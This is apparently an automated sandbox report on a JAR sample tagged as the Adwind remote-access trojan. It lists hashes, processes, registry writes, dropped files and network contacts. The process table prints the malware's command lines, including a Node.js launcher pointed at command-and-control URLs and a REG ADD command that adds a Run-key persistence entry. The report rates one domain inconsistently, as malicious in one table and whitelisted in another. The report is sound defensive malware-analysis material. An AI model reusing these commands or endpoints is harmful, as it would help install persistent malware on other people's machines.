File name: | Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar.zip |
Full analysis: | https://app.any.run/tasks/ee7e77a4-e340-4d5f-895e-2fb1e935c606 |
Verdict: | Malicious activity |
Threats: | Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015. |
Analysis date: | May 30, 2020, 12:45:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 165A27EFE0F0A3347C4C17C66E7EB83A |
SHA1: | F931F62FA8FD4E4CB53E0C8608B97831770815FE |
SHA256: | E278FD6BBB2AD4E8BBD26BDF99AAA82FD56D5BDBAC84193B9EE63619E75A05C3 |
SSDEEP: | 96:XPpF8ekRD6Nfv4zzkWzP6VJEccqhTfqJEN9XIkx3obWVHELXHJBc:Xz8d9694PrkEcDcJEN9XI4Y4HELo |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar |
---|---|
ZipUncompressedSize: | 6147 |
ZipCompressedSize: | 5371 |
ZipCRC: | 0xc33857d3 |
ZipModifyDate: | 2020:05:30 09:15:21 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2124 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3564 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\Desktop\Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | explorer.exe | |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Version: 8.0.920.14 | ||||
2764 | C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://central.qhub.qua.one --central-base-url https://3769683.middlegate.qua.one --central-base-url https://fake1.3769683.middlegate.qua.one --central-base-url invalid.https://3769683.middlegate.qua.one | C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe | javaw.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 13.13.0 | ||||
908 | C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-ea019c0f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\qnodejs-ea019c0f.cmd\""" | C:\Windows\system32\cmd.exe | — | node.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2780 | REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-ea019c0f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\qnodejs-ea019c0f.cmd\"" | C:\Windows\system32\reg.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
728 | C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\qnodejs-win32-ia32.js serve start --group user:[email protected] --register-startup --central-base-url https://central.qhub.qua.one --central-base-url https://3769683.middlegate.qua.one --central-base-url https://fake1.3769683.middlegate.qua.one --central-base-url invalid.https://3769683.middlegate.qua.one | C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe | node.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 13.13.0 |
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtBMP |
Value: | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtIcon |
Value: | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12F\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12F\52C64B7E |
Operation: | write | Name: | @C:\Windows\system32\NetworkExplorer.dll,-1 |
Value: Network | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar.zip | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | name |
Value: 120 | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | size |
Value: 80 | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | type |
Value: 120 | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | mtime |
Value: 100 | |||
(PID) Process: | (2124) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop |
PID | Process | Filename | Type | |
---|---|---|---|---|
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\node.exe | — | |
MD5:— | SHA256:— | |||
2124 | WinRAR.exe | C:\Users\admin\Desktop\Kafan_Sample_77ad06f5cddfc7fe9a902173dfc3b890ea4a86614168c9f5b25766cef071759b.jar | java | |
MD5:E635D75A5BC015838D903D49A2EFBE9E | SHA256:77AD06F5CDDFC7FE9A902173DFC3B890EA4A86614168C9F5B25766CEF071759B | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\node_modules\npm\.travis.yml | text | |
MD5:7A15CCC612A136E7096930734D633B21 | SHA256:471E07C40FA3588317141FC1E43BDE68F5FCA7511724852E9CD5588470C5C1A4 | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\install_tools.bat | text | |
MD5:4E46AD93BAC466280DED1D0C19863A26 | SHA256:4B1E875422E7A3BA28DC1A618E7569A27E2A491C161E0ADB742434B14F773BED | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\CHANGELOG.md | html | |
MD5:4B4151CB6CA2A9CD66238FB8EEC003A3 | SHA256:271FCB46F0552F847E6E5B88CDDD03168ED11E6E354B1C15FA92ED553B92EF5B | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\LICENSE | text | |
MD5:698CF46FBBD1EF7145D1D4F4977E9743 | SHA256:EAC4065F78A73669E3058A72CB936D5C79E7CE766C6ACF87A6AB37CF8D702064 | |||
3564 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:256221B9B0F319CFAF8574002D13B5F2 | SHA256:E79D6266362F82F25895DEE246EFCB70772E23FC8366EC7549FE1979C9BD2CB8 | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\node_modules\npm\AUTHORS | text | |
MD5:8E0621AA4B3C6AF29CD281BE18AD666D | SHA256:41E1395C2082DA627E8C08033FF12BE6261F52B03C22B55ED8B4E623AE24B099 | |||
3564 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2f | dbf | |
MD5:C8366AE350E7019AEFC9D1E6E6A498C6 | SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238 | |||
3564 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp3128959053\node-v13.13.0-win-x86\nodevars.bat | text | |
MD5:E6636C5B093F5CC13DFB7508305B8D8B | SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3564 | javaw.exe | 104.20.22.46:443 | nodejs.org | Cloudflare Inc | US | shared |
2764 | node.exe | 64.225.101.88:443 | central.qhub.qua.one | Peer 1 Network (USA) Inc. | US | malicious |
3564 | javaw.exe | 64.225.101.88:443 | central.qhub.qua.one | Peer 1 Network (USA) Inc. | US | malicious |
728 | node.exe | 51.15.23.91:443 | wtfismyip.com | Online S.a.s. | NL | suspicious |
728 | node.exe | 64.225.101.88:443 | central.qhub.qua.one | Peer 1 Network (USA) Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
nodejs.org |
| whitelisted |
central.qhub.qua.one |
| whitelisted |
wtfismyip.com |
| shared |